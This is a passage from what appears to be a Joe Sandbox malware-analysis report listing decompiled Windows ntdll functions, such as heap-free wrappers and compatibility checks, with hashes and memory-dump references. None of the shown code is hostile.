Opcode ID: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
Instruction ID: 8657abb88d274b576506760586136dd7117e154a400aeb0655952bd328b88332
Opcode Fuzzy Hash: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
Instruction Fuzzy Hash: 1DE08631541651EFDB713E01ED00F527AA3BB40B1CF14447AA142054F0D774F898EA55

Uniqueness

Uniqueness Score: -1.00%

Function 04D6AF50 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D6AF50(void* __ecx, void* __edx, signed int _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = E04CACEF0(__ecx, _a4, 0xfff);
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x04d6af5a
0x04d6af6b
0x04d6af81
0x00000000
0x04d6af86
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4cd88530dd3f0f8e41e96be52a138f2b45fedd8713a678cead4cc63096fcc42
Instruction ID: 29362c551662c1740c688e5d8c485bd7270f18d7c81d1d24a176d89ad8fe5b1f
Opcode Fuzzy Hash: f4cd88530dd3f0f8e41e96be52a138f2b45fedd8713a678cead4cc63096fcc42
Instruction Fuzzy Hash: 1AE0CD312C4105B7DB211E40DC00F657716DB50794F104035F9456A790C571FC51E6C4

Uniqueness

Uniqueness Score: -1.00%

Function 04D38F3C Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D38F3C() {
				signed int _t9;
				signed int* _t13;

				_t9 =  *0x4da5a74; // 0x0
				if((_t9 & 0x00000001) == 0) {
					if((_t9 & 0x00008000) != 0) {
						 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) | 0x02000000;
					}
				} else {
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) | 0x02000000;
					_t13 =  *0x4da3738; // 0x77dc46bc
					 *_t13 =  *_t13 | 0x00000001;
				}
				return 1;
			}

0x04d38f3c
0x04d38f43
0x04d38f6c
0x04d38f85
0x04d38f85
0x04d38f45
0x04d38f5a
0x04d38f5d
0x04d38f62
0x04d38f62
0x04d38f8a

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 883e7edffc3317ea1eea2589ae25b5be805884104dd05e34299e3b25e568627d
Instruction ID: 9826796a1974ceaa2d5f7ed27aa8b8c01454f314f1e7af4bad5efd562baa84c8
Opcode Fuzzy Hash: 883e7edffc3317ea1eea2589ae25b5be805884104dd05e34299e3b25e568627d
Instruction Fuzzy Hash: 7AF0E578651A80CFE31ADF08D1B1B1173FAFB45B45F540459F8468BBA1C739ED42DA80

Uniqueness

Uniqueness Score: -1.00%

Function 04CEE4BC Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CEE4BC(void* __ecx) {
				signed int _t5;
				void* _t7;
				void* _t9;

				_t9 = __ecx;
				_t5 =  *((intOrPtr*)(__ecx + 0x160));
				if(_t5 != 0) {
					_t7 = E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					 *(_t9 + 0x160) =  *(_t9 + 0x160) & 0x00000000;
					return _t7;
				} else {
					return _t5;
				}
			}

0x04cee4bf
0x04cee4c1
0x04cee4c9
0x04d2905b
0x04d29060
0x04d29068
0x04cee4d0
0x04cee4d0
0x04cee4d0

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
Instruction ID: 771d57c2621d546e13d0194e764ea827653580d4abb1d13b736ac535de8dc27d
Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
Instruction Fuzzy Hash: 35D0A932204660ABD732AA1CFD10FC333E9BB88B25F0204A9F008C7060C364EC81C680

Uniqueness

Uniqueness Score: -1.00%

Function 04D2E588 Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E04D2E588(signed int __ebx) {
				intOrPtr _t7;
				signed int _t13;
				void* _t14;
				signed int _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					E04CBE740(_t14);
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x04d2e588
0x04d2e58c
0x04d2e594
0x04d2e597
0x04d2e59c
0x04d2e59f
0x04d2e59f
0x04d2e5a4
0x04d2e5b1
0x00000000
0x04d2e5b6
0x04d2e5b9

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
Instruction ID: 8f299f24716381112b641b29c70dcd5b95cbe6392b80ca102ce6e9373d620228
Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
Instruction Fuzzy Hash: 3EE0EC359506849FDB12DB59C654F9AB7B6BB94B04F190458E4096B660C624F900DB80

Uniqueness

Uniqueness Score: -1.00%

Function 04CAA093 Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CAA093(signed int __ecx) {
				signed int _t6;
				signed int _t7;

				_t7 = _t6 ^ _t6;
				if(__ecx == 0) {
					_t7 = 0xc000000d;
				} else {
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t7, __ecx);
				}
				return _t7;
			}

0x04caa096
0x04caa09a
0x04caa0b1
0x04caa09c
0x04caa0a8
0x04caa0a8
0x04caa0b0

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
Instruction ID: 8b8b419518ab7920946ae0bcb4d9407041963cd7a10d30d61370609e77a84c9a
Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
Instruction Fuzzy Hash: A7D0123260607197DB3966557924FA779169B81A58F1A006E780B93910C5159C52E6E0

Uniqueness

Uniqueness Score: -1.00%

Function 04CEA750 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04CEA750(signed int _a4) {
				signed int _t5;

				_t5 = E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
				asm("sbb eax, eax");
				return  !( ~_t5) & _a4;
			}

0x04cea763
0x04cea76a
0x04cea772

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
Instruction ID: 6356a9571824a7e24317f6ccd54290f66cf578443fb3bf2abe66ee4b46898bda
Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
Instruction Fuzzy Hash: 2BD012371D054CBBDB119F65EC11F957BA9E794B60F048020F904875A0CA3AE950D584

Uniqueness

Uniqueness Score: -1.00%

Function 04CECE70 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CECE70(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				void* __ebp;
				intOrPtr _t5;

				E04CB254C(__ebx, _a4, __edi, __esi, __eflags);
				_t5 =  *0x4da6644; // 0x0
				return E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t5 + 0x200000, _a4);
			}

0x04cece78
0x04cece80
0x04cece9a

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dc7e715ab27874e540317e3e5625a0d3dc60c7c9c683be9f4ad8925728663bc
Instruction ID: f2885132d1f658e06924f3f3a22c0c02b69f11c8c0f269294ac1e34d1d410285
Opcode Fuzzy Hash: 8dc7e715ab27874e540317e3e5625a0d3dc60c7c9c683be9f4ad8925728663bc
Instruction Fuzzy Hash: 9CD0A932000248ABC711EF08ED60F567BAAEB94704F088020B80887272CA30FD60EA88

Uniqueness

Uniqueness Score: -1.00%

Function 04CECE3F Relevance: .0, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CECE3F(signed int __ecx) {
				void* _t6;
				intOrPtr _t7;
				intOrPtr _t11;

				if(__ecx != 0) {
					_t7 =  *0x4da6644; // 0x0
					 *(__ecx + 4) =  *(__ecx + 4) | 0x00000004;
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t7 + 0x2c0000, __ecx);
					_t11 =  *[fs:0x18];
					 *(_t11 + 0xf90) =  *(_t11 + 0xf90) & 0x00000000;
					return _t11;
				}
				return _t6;
			}

0x04cece41
0x04cece43
0x04cece48
0x04cece5c
0x04cece61
0x04cece67
0x00000000
0x04cece67
0x04cece6e

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa170dfd3d98c49f47cc730011f8ad725269faa92ef5ad1e16076c02d9d3e8a7
Instruction ID: f85b8a93c7932e0d682b7049fe5e5b6cbb6b813f0ae4751b8e9e1fa9c01d0140
Opcode Fuzzy Hash: aa170dfd3d98c49f47cc730011f8ad725269faa92ef5ad1e16076c02d9d3e8a7
Instruction Fuzzy Hash: F2D05E72511440DFE726CB04CA56F6533A4F700B04F0940BCA0068B960C328E910DB80

Uniqueness

Uniqueness Score: -1.00%

Function 02B17B20 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5832418235.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b10000_control.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c41c98b8e309da5ab51e621940081dec8d568e56afddda358075ba9bf69cc631
Instruction ID: 2c102278658520f14493079d5e49cf5e41450f3278016e9f2c5b81c10862992f
Opcode Fuzzy Hash: c41c98b8e309da5ab51e621940081dec8d568e56afddda358075ba9bf69cc631
Instruction Fuzzy Hash: 78B09B37A5601405D6354D4DB8443F1F368D743339F1463D3E808F7514C153C4561149

Uniqueness

Uniqueness Score: -1.00%

Function 04CEC620 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CEC620(intOrPtr* _a4) {

				E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_a4);
				return 0;
			}

0x04cec635
0x04cec63d

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
Instruction ID: c61a68c7db16cddc6871d2a28f7f77d4d0c07c9ec3115e6f1534ce971fb2917a
Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
Instruction Fuzzy Hash: E4C08033150644AFD711DF94DD11F4177A9E798B00F004021F70447570C531FC10E684

Uniqueness

Uniqueness Score: -1.00%

Function 04CC01C0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CC01C0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x04cc01c6
0x04cc01cb
0x04d14a6e
0x00000000
0x04d14a74
0x04d14a80
0x04d14a80
0x04cc01d1
0x04cc01d1
0x04cc01d6
0x04cc01d6

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
Instruction ID: bb1d151c8532b35b3f8af3e042783bbd0c43644534b98bf98649c7bf8abbe1c2
Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
Instruction Fuzzy Hash: EFD0E939352E80DFD71BCF5DC994B1573A4BB44F54F8544D4E801CB762D66CEA44CA04

Uniqueness

Uniqueness Score: -1.00%

Function 04D38F8B Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D38F8B() {

				if( *((char*)( *[fs:0x30] + 2)) != 0 ||  *0x7ffe02d4 != 0) {
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) | 0x00010000;
				}
				return 1;
			}

0x04d38f95
0x04d38fb5
0x04d38fb5
0x04d38fba

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
Instruction ID: eed0a2d5f485825122a8c736297de889fad64fef53eeb0cfa61d0ce8a75e4178
Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
Instruction Fuzzy Hash: 0AD05E35511AC4CFE727DB04C1A5B507BF5F745B90F850099F04247BA2C37CA984CB40

Uniqueness

Uniqueness Score: -1.00%

Function 04CD0230 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CD0230(signed short* _a4, char* _a8, char* _a12) {

				return E04CD0251( *((intOrPtr*)( *[fs:0x30] + 0x38)), _a4, _a8, _a12);
			}

0x04cd024e

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: c18b6d873be53322ec26769a0e1414d32fec1b0b53debded5ce41fc05bc03d11
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: CDD0123610024CEFCB01DF45C854D6A772BFFC8714F108019FD19076108A31FD62DA50

Uniqueness

Uniqueness Score: -1.00%

Function 04CB0670 Relevance: .0, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CB0670() {

				if(E04CC3C40() != 0) {
					return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x14));
				} else {
					return  *0x7ffe02d0;
				}
			}

0x04cb0677
0x04d0ea3d
0x04cb067d
0x04cb0682
0x04cb0682

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
Instruction ID: 97092d2158b827f824a5988944f64d33aa68d2ae29dc53821a622825d771cff9
Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
Instruction Fuzzy Hash: C0C00139682A808BDF19CA2AD284B5977E8BB48B44F154890E8058BA22E624E810DA10

Uniqueness

Uniqueness Score: -1.00%

Function 04CE7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E04CE7550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x4dab370 ^ _t107;
				_v8 =  *0x4dab370 ^ _t107;
				_t105 = __ecx;
				if( *0x4da6664 == 0) {
					L5:
					return E04CF4B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E04CBE580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E04CE7738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E04CE763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E04CF2B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E04CE76ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E04D3EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E04CF8F40( &_v548, 0, 0x214);
						_t106 =  *0x4da6664;
						_t110 = _t108 + 0x20;
						 *0x4da91e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x4da6664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E04CF4C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E04D3EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E04CFA9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E04D3EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E04CFA690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E04D3EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E04D2CC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E04D3EF10();
						goto L15;
					}
					L8:
					_t56 = E04CE7648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x04ce7560
0x04ce7562
0x04ce756f
0x04ce7571
0x04ce75ab
0x04ce75b9
0x04ce75b9
0x04ce7579
0x04ce7583
0x04ce758f
0x04d24443
0x04ce7595
0x04ce759e
0x04ce759e
0x04ce75a2
0x04ce75bc
0x04ce75c2
0x04ce75c7
0x04ce75c9
0x04ce7621
0x04ce7623
0x04ce7624
0x04ce75f8
0x04ce75ff
0x04ce7601
0x04ce762c
0x04ce7603
0x04ce7609
0x04ce7610
0x04ce7612
0x04ce7612
0x04ce7612
0x04ce7614
0x04ce7616
0x04ce7630
0x04ce7633
0x04ce7633
0x04ce7618
0x04ce761a
0x04d245c9
0x04d245c9
0x04d245d1
0x04d245d2
0x04d245d4
0x04d245d6
0x04d245d6
0x00000000
0x04ce761a
0x04ce75ce
0x04ce75d4
0x04ce75da
0x04ce75df
0x04ce75e1
0x04d2444a
0x04d24450
0x00000000
0x00000000
0x04d24456
0x04d24469
0x04d24476
0x04d24486
0x04d2448b
0x04d24497
0x04d244b9
0x04d244bf
0x04d244c1
0x04d244c3
0x00000000
0x00000000
0x04d244c9
0x04d244cf
0x04d244d1
0x00000000
0x00000000
0x04d244dc
0x04d244de
0x00000000
0x00000000
0x04d244e6
0x04d244ed
0x04d244ef
0x04d245c4
0x00000000
0x04d245c4
0x04d244f7
0x04d244f8
0x04d24510
0x04d24515
0x04d24524
0x04d2452b
0x04d2452c
0x04d2452e
0x04d24556
0x04d24561
0x04d24567
0x04d24569
0x04d2456c
0x04d2456e
0x04d24574
0x04d24576
0x00000000
0x00000000
0x00000000
0x00000000
0x04d2457c
0x04d2457c
0x04d24584
0x04d24588
0x04d2458a
0x04d2458c
0x04d2458e
0x04d2458e
0x04d2459b
0x04d245a0
0x04d245a7
0x04d245ac
0x04d245ae
0x00000000
0x00000000
0x04d245b4
0x04d245b4
0x04d245b7
0x04d245b7
0x00000000
0x04d245bf
0x04d24530
0x04d24535
0x04d24537
0x04d24539
0x00000000
0x04d2453e
0x04ce75e7
0x04ce75e9
0x04ce75ee
0x04ce75f0
0x00000000
0x00000000
0x04ce75f2
0x00000000
0x04ce75a4
0x04ce75a4
0x04ce75a4
0x00000000
0x04ce75a4

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 04D24592
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04D24460
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04D24507
ExecuteOptions, xrefs: 04D244AB
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04D24530
Execute=1, xrefs: 04D2451E
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04D2454D

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 8e638d092a6acf6bc42fe3fa1d6e5be50761d349df188aaf33661fc726943ab0
Instruction ID: ed2c46ac44beab52fddf51b373c0334104f198110a25ba949398578471cf49e3
Opcode Fuzzy Hash: 8e638d092a6acf6bc42fe3fa1d6e5be50761d349df188aaf33661fc726943ab0
Instruction Fuzzy Hash: 6051CA31A01219BAEF11AF96DC59FB973AAEF14708F0804A9E505A7180EB70BF45DF64

Uniqueness

Uniqueness Score: -1.00%

Function 04CB9046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199
COMMON

Download Yara Rule

